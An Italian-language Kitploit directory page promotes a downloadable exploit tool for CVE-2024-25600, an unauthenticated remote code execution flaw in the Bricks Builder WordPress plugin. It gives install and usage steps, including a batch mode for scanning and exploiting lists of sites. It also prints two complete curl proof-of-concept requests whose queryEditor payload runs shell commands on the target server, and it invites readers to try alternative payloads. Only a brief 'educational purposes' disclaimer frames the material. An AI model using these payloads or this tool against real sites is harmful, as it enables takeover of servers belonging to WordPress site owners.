Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-25600-Bricks-Builder-plugin-for-WordPress — Questo strumento è progettato per sfruttare la vulnerabilità CVE-2024-25600 presente nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente create per eseguire comandi arbitrari. | Kitploit
Strumenti/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

Vedi Repository
912 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo strumento è progettato per sfruttare la vulnerabilità CVE-2024-25600 presente nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente create per eseguire comandi arbitrari.

Condividi

CVE-2024-25600 - Strumento di Exploit 🚀

Descrizione 📝

Questo strumento 🛠️ è progettato per sfruttare la vulnerabilità CVE-2024-25600 🕳️ trovata nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati 💻. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente create per eseguire comandi arbitrari.

Caratteristiche 🌟

  • Modalità Interattiva: Interagisci con il sito target in tempo reale 🕹️.
  • Modalità Batch: Scansiona e sfrutta più siti web da un elenco 📋.
  • Esecuzione Comandi: Esegui comandi arbitrari sul server target ⚙️.

Installazione 🛠️

  1. Clona questo repository sulla tua macchina locale 🖥️ usando git clone.
  2. Spostati nella directory del repository clonato.
  3. Installa le librerie Python richieste usando pip install -r requirements.txt.

Utilizzo 📖

Modalità Interattiva 🎮

  1. Esegui lo strumento con python exploit.py -u <URL> per avviare la modalità interattiva.
  2. Segui le istruzioni a schermo per inviare comandi al server target.

Modalità Batch 📊

  1. Prepara un file di testo con un elenco di URL target.
  2. Esegui lo strumento con python exploit.py -l <percorso_file> per scansionare e sfruttare i siti elencati.

Dimostrazione di Concetto (PoC) 📝

Il PoC di base fornito dalla divulgazione è il seguente:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Aggiornamento: Secondo PoC (più affidabile)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

È possibile che payload aggiuntivi producano risultati migliori. Se il mio exploit o la dimostrazione di concetto non funzionano per te, ti incoraggio a sperimentare con payload alternativi per trovare una soluzione più efficace.

Sostituisci [HOST] con il sito target e [NONCE] con il valore nonce recuperato dal sito.

Riferimenti 📖

Per maggiori informazioni sulla vulnerabilità CVE-2024-25600, consulta la divulgazione dettagliata su Snicco.io.

Disclaimer ⚠️

Le informazioni fornite in questo README sono solo a scopo educativo. L'accesso non autorizzato a siti web o reti è illegale e non etico. 🚫

Riconoscimenti 🙏

Riconoscimenti ai ricercatori di sicurezza che hanno scoperto e segnalato questa vulnerabilità, fornendo alla comunità informazioni e strumenti per aiutare a proteggere le loro applicazioni web.

Scarica lo strumento